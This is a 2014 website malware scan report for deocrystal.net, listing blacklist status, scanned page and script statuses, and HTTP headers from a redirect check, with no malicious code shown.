Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=deocrystal.net
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://deocrystal.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://deocrystal.net/ | 200 OK Content-Length: 64499 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
http://deocrystal.net/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/x-javascript | clean |
http://deocrystal.net/components/com_rsform/controller/functions.js | 200 OK Content-Length: 18523 Content-Type: application/x-javascript | clean |
http://deocrystal.net/templates/Deoblu/js/mootools1.11.js | 200 OK Content-Length: 43710 Content-Type: application/x-javascript | clean |
http://deocrystal.net/templates/Deoblu/js/menu.js | 200 OK Content-Length: 1495 Content-Type: application/x-javascript | clean |
http://deocrystal.net/templates/Deoblu/js/main.js | 200 OK Content-Length: 377 Content-Type: application/x-javascript | clean |
http://deocrystal.net/share42/share42.js | 200 OK Content-Length: 3386 Content-Type: application/x-javascript | clean |
http://deocrystal.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: deocrystal.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 17 Sep 2014 04:26:16 GMT
Pragma: no-cache
Server: nginx/1.4.2
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 17 Sep 2014 04:26:16 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 707bbdb1cd51e01a5ecf21e758737f8a=bg6vr1n03hriuoef1adq91hfj5; path=/
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: deocrystal.net
Referer: http://www.google.com/search?q=deocrystal.net
Result:
The result is similar to the first query. There are no suspicious redirects found.